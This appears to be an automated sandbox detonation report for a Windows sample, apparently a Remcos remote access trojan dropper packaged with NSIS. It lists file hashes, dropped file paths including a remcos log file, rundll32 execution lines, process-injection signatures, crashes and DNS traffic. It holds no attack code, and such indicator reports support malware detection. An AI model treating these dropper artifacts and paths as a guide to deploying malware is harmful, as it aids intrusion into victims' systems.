SHA512 4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57

C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\BgImage.dll

MD5 521df745a41f0b8164ffd01717cacbba
SHA1 dc7a9eacfbeb1fae52091da5e80db6cb1b6bce74
SHA256 dbf91707fa157603bea025a6411cdcb497ab11262c9c18b14dc431a45aa17c0b
SHA512 c5b1ba062872a8f534e2f0eac57fc3c0d8be9cda79605d86566d67260ba5477444a0ddfed1838b4fb14c677e5342c8419a88fcd38147dbaa36ac1f9e00c52bbe

C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\UserInfo.dll

MD5 acbda33dd5700c122e2fe48e3d4351fd
SHA1 2c154baf7c64052ee712b7cdf9c36b7697dd3fc8
SHA256 943b33829f9013e4d361482a5c8981ba20a7155c78691dbe02a8f8cd2a02efa0
SHA512 d090adf65a74ac5b910b18bb67e989714335e7b4778cd771cff154d7186351a1bebbc7103cca849bdfa2709c991947ffff6c1d8fdf16a74f4dfb614bce3ff6fd

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhnqlb3m.fum.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San

MD5 bf1ebfd1285dd7ef43a587e9f51a8e33
SHA1 1dede4026611e9f40c91d9bbe406a06b2fd8bfa4
SHA256 de1db1c0a065f580b4fe878c5b363933e45ec7f0c06118d29b6d167af24189ff
SHA512 3b7b11a8989a0b46e4091c8e4c81e71a2454fc9fba77618d844653d548ecd59a2c8b8fce3338fa499ca84da8664f7e34f355ab8b18e3507598f5f63dd3a80389

C:\Users\Admin\AppData\Local\kilns\Unobtainably\Polemoniaceae11.Non

MD5 afc1982fff88592a55312010cfc773c6
SHA1 c57e918c5149ca9c2a331a78ecef84ffc667feb7
SHA256 02a71af4b95cf275ba0430022e9c2665bd1e4ddb3177202c1c3059901eefd4f0
SHA512 f4acf46244cb0115e0666a631af6dd2e7400478103cd9c152e48307a2239108e7e6bf3b39467747b3efa8b0fbdc59216ad6a26ec5587c19bb56fb4512233117e

C:\Users\Admin\AppData\Local\Temp\dtgxucotnzmfifzebwqmlwxcdtnqyepc

MD5 60e30555becdb968406edb87fff512ef
SHA1 65551417f6371c40e6d5dab38fe87ab634f9446e
SHA256 9e347aa1a363532c72d7728abe1afdc48b9418fae8cbf8bcbc50c9c22dfefa57
SHA512 cbe1aebf171b54f481028208aa85fb04145cc40772cc30e67107caa5cc70c73f274da362766f125093c1fab1416c687744e53e0f7c30b6ead866c6f6ba671449

C:\ProgramData\remcos\logs.dat

MD5 434c9f981eadaffbec7aa8743e23e311
SHA1 d9454d2aaf51e2b1f4660c28006954234963b962
SHA256 2668d8f69a8ada3b2740a5ac2fe5ed1c8fba11a658c62647aa98a526870ba708
SHA512 60a9589eb71556df85a12b633103d7b5246685f353a11ed5aeb8a7cca926e7d193ebb176a770d817b9df16dba12ea1381dc759c888ca3776f5aad8b7b2c7e976

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win10v2004-20240709-en

Max time kernel

149s

Max time network

153s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3504 wrote to memory of 4604 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3504 wrote to memory of 4604 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3504 wrote to memory of 4604 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win7-20240705-en

Max time kernel

117s

Max time network

118s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 220

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win10v2004-20240709-en

Max time kernel

94s

Max time network

132s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 2224 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2420 wrote to memory of 2224 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2420 wrote to memory of 2224 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2224 -ip 2224

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 624

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win7-20240705-en

Max time kernel

120s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 240

Network

N/A

Files

N/A